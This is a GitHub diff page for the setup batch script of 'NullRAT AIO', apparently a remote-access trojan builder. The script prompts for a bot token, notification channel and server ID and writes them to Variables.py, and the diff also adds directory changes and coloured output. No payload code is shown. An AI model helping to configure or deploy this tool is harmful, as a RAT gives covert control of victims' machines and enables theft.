This repository was archived by the owner on Mar 6, 2026. It is now read-only.
File tree Expand file tree Collapse file tree
Expand file tree Collapse file tree Original file line number Diff line number Diff line change @@ -64,6 +64,7 @@ if %errorlevel%==2 (
6464:vars
6565mode con: cols=90 lines=30
6666@ title NullRAT AIO (Variables Setter)
67+ cd " %~dp0 NullRAT"
6768cls & echo .
6869echo [38;2;0;220;255m██████╗ ██╗ ██╗ ██╗ █████╗ ██████╗ ██╗ █████╗ ██████╗ ██╗ ███████╗███████╗[38;2;255;255;255m
6970echo [38;2;0;200;255m╚════██╗╚██╗ ██║ ██║██╔══██╗██╔══██╗██║██╔══██╗██╔══██╗██║ ██╔════╝██╔════╝[38;2;255;255;255m
@@ -127,7 +128,7 @@ if %errorlevel%==2 (
127128 goto a
128129)
129130if %errorlevel% == 1 (
130- echo . & echo The following information is correct.
131+ echo . & echo [38;2;0;120;255mThe following information is correct.[38;2;255;255;255m
131132 timeout /t 2 & goto compiler
132133)
133134
@@ -143,6 +144,7 @@ if "%notification%"=="" (cls & echo [ERROR] Notification cannot be empty! & goto
143144set /p " server = Enter Server ID: "
144145if " %server% " == " " (cls & echo [ERROR] Server cannot be empty! & goto createF)
145146
147+ cd " %~dp0 NullRAT"
146148echo ^ # This file was auto-generated by NullRAT Variables^ . DO NOT SHARE^ ! > Variables.py
147149echo bot_token = ^ " %token% ^" >> Variables.py
148150echo notification_channel = %notification% >> Variables.py
You can’t perform that action at this time.
0 commit comments